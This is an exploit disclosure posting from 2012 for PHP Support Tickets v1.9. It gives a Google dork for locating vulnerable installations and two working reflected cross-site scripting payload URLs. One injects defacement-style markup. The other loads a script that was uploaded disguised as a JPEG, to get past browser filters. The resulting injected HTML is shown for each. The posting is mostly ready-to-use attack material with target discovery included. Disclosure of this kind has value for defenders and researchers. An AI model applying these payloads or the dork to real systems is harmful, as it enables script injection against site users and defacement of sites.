Home / exploits PHP Support Tickets 1.9 Cross Site Scripting
Posted on 07 November 2012
Google dork: "PHP Support Tickets v1.9" inurl:index.php?action= "PHP Support Tickets v1.9" by "Triangle Solutions Ltd" allows XSS attack at index.php and some implementations also has a bad uploaded files validation allowing to upload a js with a jpg extension that could be using for bypassing XSS browser filters. Demo 1 (XSS): url: http://server.com/app_folder/index.php?action=Register<marquee><h1>Sys_A501% 20@%20Raza-Mexicana.org</h1></marquee> Code: <!-- PHP Support Tickets Manager - Triangle Solutions Ltd /--> <!-- END OF HEADER FILE --> <table width="75%" cellspacing="1" cellpadding="1" class="boxborder" align="center"> <tr> <td class="boxborder text" bgcolor="#AABBDD">Register<marquee><h1>Sys_A501 @ Raza-Mexicana.org</h1></marquee></td> Demo 2 (JS as JPEG): url: http://server.com/app_folder/index.php?action=Login%3Cscript%20src=./upload/ 1671.jpg%3E%3C/script%3E Code: <!-- PHP Support Tickets Manager - Triangle Solutions Ltd /--> <!-- END OF HEADER FILE --> <table width="75%" cellspacing="1" cellpadding="1" class="boxborder" align="center"> <tr> <td class="boxborder text" bgcolor="#AABBDD">Login<script src=./upload/1671.jpg></script></td> Sys_A501 sys_a501@raza-mexicana.org sys.a501@gmail.com www.raza-mexicana.org http://inrootwetrust.org.mx/
